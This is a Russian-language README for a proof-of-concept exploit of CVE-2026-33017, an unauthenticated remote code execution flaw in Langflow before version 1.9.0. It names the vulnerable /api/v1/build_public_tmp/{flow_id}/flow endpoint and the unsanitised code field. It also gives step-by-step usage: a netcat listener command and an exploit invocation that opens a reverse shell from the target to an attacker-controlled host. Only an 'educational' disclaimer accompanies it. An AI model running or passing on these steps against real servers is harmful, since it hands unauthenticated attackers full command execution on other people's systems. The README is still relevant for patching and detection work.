
Эксплойт CVE-2026-33017 | от infrar3d
xpl0ited by infrar3d
Этот proof-of-concept эксплойт нацелен на критическую уязвимость удалённого выполнения кода (RCE) в версиях Langflow до 1.9.0. Уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольные системные команды путём внедрения вредоносного Python-кода через конечную точку API построения потоков. Уязвимость существует в конечной точке /api/v1/build_public_tmp/{flow_id}/flow endpoint, которая ненадлежащим образом очищает пользовательский код в поле code шаблонов компонентов.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
Первый терминал (слушатель):
nc -lvnp 4444
Второй терминал (эксплойт):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Данное программное обеспечение и proof-of-concept код предоставляются только в образовательных и исследовательских целях.
Вы несёте ответственность за соблюдение всех применимых законов. Используйте этично и ответственно.